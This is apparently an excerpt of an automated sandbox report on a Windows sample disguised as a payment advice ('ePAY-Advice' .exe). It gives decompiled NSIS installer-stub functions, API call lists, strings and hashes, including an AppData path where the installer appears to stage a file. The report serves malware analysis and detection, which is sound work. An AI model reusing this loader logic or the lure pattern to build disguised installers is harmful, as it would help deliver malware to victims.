						L22:
						_t31 = 2;
						return _t31;
					} else {
						_t71 =  *0x423700;
						 *0x422ea4 = E00401000;
						 *0x422eb0 =  *0x423700;
						 *0x422eb4 = _t25;
						 *0x422ec4 = 0x4091f4;
						if(RegisterClassA(0x422ea0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoA(0x30, 0,  &_v16, 0);
						 *0x41fce8 = CreateWindowExA(0x80, 0x4091f4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423700, 0);
						goto L21;
					}
				} else {
					_t71 =  *(_t76 + 0x48);
					_t86 = _t71;
					if(_t71 == 0) {
						goto L16;
					}
					_t74 = 0x4226a0;
					E00405E51(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x423758, 0x4226a0, 0);
					_t57 =  *0x4226a0; // 0x43
					if(_t57 == 0) {
						goto L16;
					}
					if(_t57 == 0x22) {
						_t74 = 0x4226a1;
						 *((char*)(E0040592D(0x4226a1, 0x22))) = 0;
					}
					_t59 = lstrlenA(_t74) + _t74 - 4;
					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
						L15:
						E00405F6A(_t80, E00405902(_t74));
						goto L16;
					} else {
						_t63 = GetFileAttributesA(_t74);
						if(_t63 == 0xffffffff) {
							L14:
							E00405949(_t74);
							goto L15;
						}
						_t92 = _t63 & 0x00000010;
						if((_t63 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x0040379e
0x004037a7
0x004037ae
0x004037b0
0x004037c4
0x004037d6
0x004037dd
0x004037e4
0x004037ea
0x004037ef
0x004037f5
0x00403808
0x00403808
0x00403813
0x004037b2
0x004037b2
0x004037bd
0x004037bd
0x00403818
0x00403822
0x0040382b
0x00403830
0x00403841
0x004038c8
0x004038d0
0x004038d9
0x004038d9
0x004038ef
0x004038f5
0x00403903
0x00403984
0x0040398c
0x00403996
0x0040399b
0x004039a1
0x00403a2b
0x00403a30
0x00403a32
0x00403a4e
0x00000000
0x00403a4e
0x00403a34
0x00403a3a
0x00403a42
0x00403a42
0x00000000
0x00403a3a
0x004039af
0x004039ba
0x004039bf
0x004039c1
0x004039c8
0x004039c8
0x004039d3
0x004039db
0x004039dd
0x004039df
0x004039e8
0x004039eb
0x004039f1
0x004039f1
0x004039f7
0x00403a10
0x00403a21
0x00000000
0x00403a26
0x0040398e
0x00403990
0x00000000
0x00403905
0x00403905
0x00403911
0x0040391b
0x00403921
0x00403926
0x00403935
0x00403a53
0x00403a53
0x00000000
0x00403a53
0x00403944
0x0040397f
0x00000000
0x0040397f
0x00403847
0x00403847
0x0040384a
0x0040384c
0x00000000
0x00000000
0x00403856
0x00403866
0x0040386b
0x00403872
0x00000000
0x00000000
0x00403876
0x00403878
0x00403885
0x00403885
0x0040388d
0x00403893
0x004038bb
0x004038c3
0x00000000
0x004038a5
0x004038a6
0x004038af
0x004038b5
0x004038b6
0x00000000
0x004038b6
0x004038b1
0x004038b3
0x00000000
0x00000000
0x00000000
0x004038b3
0x00403893

APIs

Part of subcall function 00406302: GetModuleHandleA.KERNEL32(?,?,?,00403249,0000000A), ref: 00406314
Part of subcall function 00406302: GetProcAddress.KERNEL32(00000000,?), ref: 0040632F

GetUserDefaultUILanguage.KERNELBASE(00000002,766DFA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe",00000000), ref: 004037B2

Part of subcall function 00405EC8: wsprintfA.USER32 ref: 00405ED5

lstrcatA.KERNEL32(1033,0041FD08,80000001,Control Panel\Desktop\ResourceLocale,00000000,0041FD08,00000000,00000002,766DFA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe",00000000), ref: 00403813
lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr,1033,0041FD08,80000001,Control Panel\Desktop\ResourceLocale,00000000,0041FD08,00000000,00000002,766DFA90), ref: 00403888
lstrcmpiA.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr,1033,0041FD08,80000001,Control Panel\Desktop\ResourceLocale,00000000,0041FD08,00000000), ref: 0040389B
GetFileAttributesA.KERNEL32(Call), ref: 004038A6
LoadImageA.USER32 ref: 004038EF
RegisterClassA.USER32 ref: 0040392C
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403944
CreateWindowExA.USER32 ref: 00403979
ShowWindow.USER32(00000005,00000000), ref: 004039AF
GetClassInfoA.USER32 ref: 004039DB
GetClassInfoA.USER32 ref: 004039E8
RegisterClassA.USER32 ref: 004039F1
DialogBoxParamA.USER32 ref: 00403A10

Strings

"C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe", xrefs: 0040379C
RichEdit20A, xrefs: 004039D3, 004039D9
C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr, xrefs: 00403822, 0040382A, 004038C2, 004038C8, 004038D8
RichEd32, xrefs: 004039C3
Control Panel\Desktop\ResourceLocale, xrefs: 004037CC
.exe, xrefs: 00403895
1033, xrefs: 004037B8, 0040380E
RichEdit, xrefs: 004039E2
Call, xrefs: 00403856, 0040385E, 0040386B, 004038B5, 004038BB
C:\Users\user\AppData\Local\Temp\, xrefs: 0040379D
_Nb, xrefs: 0040390B, 00403973
RichEd20, xrefs: 004039B5
.DEFAULT\Control Panel\International, xrefs: 004037FE

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 606308-3893604679
Opcode ID: fdd1c6f164d69bb04a2db118324e420eee4596cf25755c9c8f65584aa60a0941
Instruction ID: 22145a8d87807f1e884b2dd2f98424a05527e1b570cf61420d2a276d1199ab18
Opcode Fuzzy Hash: fdd1c6f164d69bb04a2db118324e420eee4596cf25755c9c8f65584aa60a0941
Instruction Fuzzy Hash: 3B61D5B1744200BED720BF659D45F2B3AACEB4475AB40447EF941B22E2C67C9D069A2E

Uniqueness

Uniqueness Score: -1.00%

Function 00402D63 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E00402D63(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Users\\alfons\\Desktop\\ePAY-Advice_Rf[UC7749879100].exe";
				 *0x423710 = _t43 + 0x3e8; // executed
				GetModuleFileNameA(0, "C:\\Users\\alfons\\Desktop\\ePAY-Advice_Rf[UC7749879100].exe", 0x400); // executed
				_t89 = E00405B03(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x409018 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Users\\alfons\\Desktop";
				E00405F6A("C:\\Users\\alfons\\Desktop", _t91);
				E00405F6A(0x42b000, E00405949(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x4168c4 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402CFF(1);
					__eflags =  *0x423718 - _t82;
					if( *0x423718 == _t82) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						E0040318E( *0x423718 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E00402F9C(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x423714 = _t94;
							 *0x42371c =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x423720 =  *0x423720 + 1;
								__eflags =  *0x423720;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405ABE(0x423740, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E0040318E( *0x40a8b8);
					_t65 = E00403178( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x423718) & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E00403178(0x4168c8, _t90);
						__eflags = _t71;
						if(_t71 == 0) {
							E00402CFF(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x423718;
						if( *0x423718 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402CFF(0);
							}
							goto L20;
						}
						E00405ABE( &_v44, 0x4168c8, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x40a8b8; // 0x4fb4b
						 *0x4237c0 =  *0x4237c0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x423718 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t24 = _t80 - 4; // 0x409194
							_t93 = _t24;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x4168c4; // 0x50570
						if(__eflags < 0) {
							_v12 = E004063B9(_v12, 0x4168c8, _t90);
						}
						 *0x40a8b8 =  *0x40a8b8 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

0x00402d6b
0x00402d6e
0x00402d71
0x00402d74
0x00402d7a
0x00402d8b
0x00402d90
0x00402da3
0x00402da8
0x00402dab
0x00402db1
0x00000000
0x00402db3
0x00402dbe
0x00402dc4
0x00402dd5
0x00402ddc
0x00402de2
0x00402de4
0x00402de9
0x00402deb
0x00402ed8
0x00402eda
0x00402edf
0x00402ee6
0x00000000
0x00000000
0x00402ee8
0x00402eeb
0x00402f0f
0x00402f14
0x00402f1a
0x00402f25
0x00402f2a
0x00402f2d
0x00402f2e
0x00402f2f
0x00402f31
0x00402f36
0x00402f39
0x00402f4c
0x00402f50
0x00402f58
0x00402f5d
0x00402f5f
0x00402f5f
0x00402f5f
0x00402f67
0x00402f67
0x00402f6a
0x00402f6b
0x00402f6b
0x00402f6e
0x00402f70
0x00402f70
0x00402f70
0x00402f7a
0x00402f80
0x00402f8e
0x00402f93
0x00000000
0x00402f93
0x00000000
0x00402f39
0x00402ef3
0x00402efe
0x00402f03
0x00402f05
0x00000000
0x00000000
0x00402f0a
0x00402f0d
0x00000000
0x00000000
0x00000000
0x00402df1
0x00402df6
0x00402dfb
0x00402dff
0x00402e06
0x00402e0b
0x00402e0d
0x00402e0f
0x00402e0f
0x00402e13
0x00402e18
0x00402e1a
0x00402f44
0x00402f3b
0x00000000
0x00402f3b
0x00402e20
0x00402e27
0x00402ea3
0x00402ea7
0x00402eab
0x00402eb0
0x00000000
0x00402ea7
0x00402e30
0x00402e35
0x00402e38
0x00402e3d
0x00000000
0x00000000
0x00402e3f
0x00402e46
0x00000000
0x00000000
0x00402e48
0x00402e4f
0x00000000
0x00000000
0x00402e51
0x00402e58
0x00000000
0x00000000
0x00402e5a
0x00402e61
0x00000000
0x00000000
0x00402e63
0x00402e69
0x00402e72
0x00402e78
0x00402e7b
0x00402e7d
0x00402e83
0x00000000
0x00000000
0x00402e89
0x00402e8d
0x00402e95
0x00402e95
0x00402e98
0x00402e98
0x00402e9b
0x00402e9d
0x00402e9f
0x00402e9f
0x00000000
0x00402e9d
0x00402e8f
0x00402e93
0x00000000
0x00000000
0x00000000
0x00402eb1
0x00402eb1
0x00402eb7
0x00402ec3
0x00402ec3
0x00402ec6
0x00402ecc
0x00402ece
0x00402ece
0x00402ed6
0x00402ed6
0x00000000
0x00402ed6

APIs

GetTickCount.KERNEL32 ref: 00402D74
GetModuleFileNameA.KERNELBASE(00000000,C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe,00000400), ref: 00402D90

Part of subcall function 00405B03: GetFileAttributesA.KERNELBASE(00000003,00402DA3,C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe,80000000,00000003), ref: 00405B07
Part of subcall function 00405B03: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B29

GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe,C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe,80000000,00000003), ref: 00402DDC

Strings

"C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe", xrefs: 00402D63
Null, xrefs: 00402E5A
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F3B
Inst, xrefs: 00402E48
soft, xrefs: 00402E51
Error launching installer, xrefs: 00402DB3
C:\Users\user\AppData\Local\Temp\, xrefs: 00402D6A
C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe, xrefs: 00402D7A, 00402D89, 00402D9D, 00402DBD
C:\Users\user\Desktop, xrefs: 00402DBE, 00402DC3, 00402DC9

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 4283519449-2063919042
Opcode ID: ffb6ba3e574dc433806931820d70e63332b8b9ce46135d4a7db76d65476e0ec7
Instruction ID: 2e32d7aad0b4ca297083aa7498b96cb894cc3d31802a5233eda7db803f364c93
Opcode Fuzzy Hash: ffb6ba3e574dc433806931820d70e63332b8b9ce46135d4a7db76d65476e0ec7
Instruction Fuzzy Hash: CB51D6B1900215ABDB219F65DE89B9F7AB8EB04365F10403BF904B62D1C7BC9E418B9D

Uniqueness

Uniqueness Score: -1.00%

Function 00405F8C Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 199
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			E00405F8C(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t38;
				CHAR* _t39;
				signed int _t41;
				char _t52;
				char _t53;
				char _t55;
				char _t57;
				void* _t65;
				char* _t66;
				signed int _t80;
				intOrPtr _t86;
				char _t88;
				void* _t89;
				CHAR* _t90;
				void* _t92;
				signed int _t97;
				signed int _t99;
				void* _t100;

				_t92 = __esi;
				_t89 = __edi;
				_t65 = __ebx;
				_t38 = _a8;
				if(_t38 < 0) {
					_t86 =  *0x422edc; // 0x7dbd8b
					_t38 =  *(_t86 - 4 + _t38 * 4);
				}
				_push(_t65);
				_push(_t92);
				_push(_t89);
				_t66 = _t38 +  *0x423758;
				_t39 = 0x4226a0;
				_t90 = 0x4226a0;
				if(_a4 >= 0x4226a0 && _a4 - 0x4226a0 < 0x800) {
					_t90 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t88 =  *_t66;
					if(_t88 == 0) {
						break;
					}
					__eflags = _t90 - _t39 - 0x400;
					if(_t90 - _t39 >= 0x400) {
						break;
					}
					_t66 = _t66 + 1;
					__eflags = _t88 - 4;
					_a8 = _t66;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t90 = _t88;
							_t90 =  &(_t90[1]);
							__eflags = _t90;
						} else {
							 *_t90 =  *_t66;
							_t90 =  &(_t90[1]);
							_t66 = _t66 + 1;
						}
						continue;
					}
					_t41 =  *((char*)(_t66 + 1));
					_t80 =  *_t66;
					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
					_v24 = _t80;
					_v28 = _t80 | 0x00000080;
					_v16 = _t41;
					_v20 = _t41 | 0x00000080;
					_t66 = _a8 + 2;
					__eflags = _t88 - 2;
					if(_t88 != 2) {
						__eflags = _t88 - 3;
						if(_t88 != 3) {
							__eflags = _t88 - 1;
							if(_t88 == 1) {
								__eflags = (_t41 | 0xffffffff) - _t97;
								E00405F8C(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
							}
							L42:
							_t90 =  &(_t90[lstrlenA(_t90)]);
							_t39 = 0x4226a0;
							continue;
						}
						__eflags = _t97 - 0x1d;
						if(_t97 != 0x1d) {
							__eflags = "C:\\Users\\alfons\\AppData\\Roaming\\fumigatorium\\Tertser\\Omstrukturdnr\\Provokations.Fje" + (_t97 << 0xa);
							E00405F6A(_t90, "C:\\Users\\alfons\\AppData\\Roaming\\fumigatorium\\Tertser\\Omstrukturdnr\\Provokations.Fje" + (_t97 << 0xa));
						} else {
							E00405EC8(_t90,  *0x423708);
						}
						__eflags = _t97 + 0xffffffeb - 7;
						if(_t97 + 0xffffffeb < 7) {
							L33:
							E004061D4(_t90);
						}
						goto L42;
					}
					_t52 =  *0x42370c;
					__eflags = _t52;
					_t99 = 2;
					if(_t52 >= 0) {
						L13:
						_a8 = 1;
						L14:
						__eflags =  *0x4237a4;
						if( *0x4237a4 != 0) {
							_t99 = 4;
						}
						__eflags = _t80;
						if(__eflags >= 0) {
							__eflags = _t80 - 0x25;
							if(_t80 != 0x25) {
								__eflags = _t80 - 0x24;
								if(_t80 == 0x24) {
									GetWindowsDirectoryA(_t90, 0x400);
									_t99 = 0;
								}
								while(1) {
									__eflags = _t99;
									if(_t99 == 0) {
										goto L30;
									}
									_t53 =  *0x423704;
									_t99 = _t99 - 1;
									__eflags = _t53;
									if(_t53 == 0) {
										L26:
										_t55 = SHGetSpecialFolderLocation( *0x423708,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
										__eflags = _t55;
										if(_t55 != 0) {
											L28:
											 *_t90 =  *_t90 & 0x00000000;
											__eflags =  *_t90;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v8, _t90);
										_v12 = _t55;
										__imp__CoTaskMemFree(_v8);
										__eflags = _v12;
										if(_v12 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _a8;
									if(_a8 == 0) {
										goto L26;
									}
									_t57 =  *_t53( *0x423708,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90); // executed
									__eflags = _t57;
									if(_t57 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryA(_t90, 0x400);
							goto L30;
						} else {
							E00405E51((_t80 & 0x0000003f) +  *0x423758, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x423758, _t90, _t80 & 0x00000040); // executed
							__eflags =  *_t90;
							if( *_t90 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E00405F8C(_t66, _t90, _t99, _t90, _v16);
							L30:
							__eflags =  *_t90;
							if( *_t90 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags = _t52 - 0x5a04;
					if(_t52 == 0x5a04) {
						goto L13;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L13;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L13;
					} else {
						_a8 = _a8 & 0x00000000;
						goto L14;
					}
				}
				 *_t90 =  *_t90 & 0x00000000;
				if(_a4 == 0) {
					return _t39;
				}
				return E00405F6A(_a4, _t39);
			}

0x00405f8c
0x00405f8c
0x00405f8c
0x00405f92
0x00405f97
0x00405f99
0x00405fa8
0x00405fa8
0x00405fb0
0x00405fb1
0x00405fb2
0x00405fb3
0x00405fb6
0x00405fbe
0x00405fc0
0x00405fd7
0x00405fda
0x00405fda
0x004061b1
0x004061b1
0x004061b5
0x00000000
0x00000000
0x00405fe7
0x00405fed
0x00000000
0x00000000
0x00405ff3
0x00405ff4
0x00405ff7
0x00405ffa
0x004061a4
0x004061ae
0x004061b0
0x004061b0
0x004061a6
0x004061a8
0x004061aa
0x004061ab
0x004061ab
0x00000000
0x004061a4
0x00406000
0x00406004
0x00406014
0x0040601b
0x0040601e
0x00406026
0x00406029
0x00406030
0x00406031
0x00406034
0x00406151
0x00406154
0x00406184
0x00406187
0x0040618c
0x00406190
0x00406190
0x00406195
0x0040619b
0x0040619d
0x00000000
0x0040619d
0x00406156
0x00406159
0x0040616e
0x00406175
0x0040615b
0x00406162
0x00406162
0x0040617d
0x00406180
0x00406149
0x0040614a
0x0040614a
0x00000000
0x00406180
0x0040603a
0x00406041
0x00406043
0x00406044
0x0040605e
0x0040605e
0x00406065
0x00406065
0x0040606c
0x00406070
0x00406070
0x00406071
0x00406073
0x004060ac
0x004060af
0x004060bf
0x004060c2
0x004060ca
0x004060d0
0x004060d0
0x0040612f
0x0040612f
0x00406131
0x00000000
0x00000000
0x004060d4
0x004060db
0x004060dc
0x004060de
0x004060f8
0x00406106
0x0040610c
0x0040610e
0x0040612c
0x0040612c
0x0040612c
0x00000000
0x0040612c
0x00406114
0x0040611d
0x00406120
0x00406126
0x0040612a
0x00000000
0x00000000
0x00000000
0x0040612a
0x004060e0
0x004060e3
0x00000000
0x00000000
0x004060f2
0x004060f4
0x004060f6
0x00000000
0x00000000
0x00000000
0x004060f6
0x00000000
0x0040612f
0x004060b7
0x00000000
0x00406075
0x00406090
0x00406095
0x00406098
0x00406138
0x00406138
0x0040613c
0x00406144
0x00406144
0x00000000
0x0040613c
0x004060a2
0x00406133
0x00406133
0x00406136
0x00000000
0x00000000
0x00000000
0x00406136
0x00406073
0x00406046
0x0040604a
0x00000000
0x00000000
0x0040604c
0x00406050
0x00000000
0x00000000
0x00406052
0x00406056
0x00000000
0x00406058
0x00406058
0x00000000
0x00406058
0x00406056
0x004061bb
0x004061c5
0x004061d1
0x004061d1
0x00000000

APIs

GetSystemDirectoryA.KERNEL32 ref: 004060B7
GetWindowsDirectoryA.KERNEL32(Call,00000400,?,0041F4E8,00000000,004050C9,0041F4E8,00000000), ref: 004060CA
SHGetSpecialFolderLocation.SHELL32(004050C9,00000000,?,0041F4E8,00000000,004050C9,0041F4E8,00000000), ref: 00406106
SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 00406114
CoTaskMemFree.OLE32(00000000), ref: 00406120
lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406144
lstrlenA.KERNEL32(Call,?,0041F4E8,00000000,004050C9,0041F4E8,00000000,00000000,0040E8C0,00000000), ref: 00406196

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00406086
\Microsoft\Internet Explorer\Quick Launch, xrefs: 0040613E
C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Provokations.Fje, xrefs: 0040616E
Call, xrefs: 00405FB6, 00406083, 00406084, 00406085, 004060A1, 004060B6, 004060C9, 004060E5, 00406110, 00406143, 00406149, 00406161, 00406174, 0040618F, 00406195, 0040619D, 004061C7

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
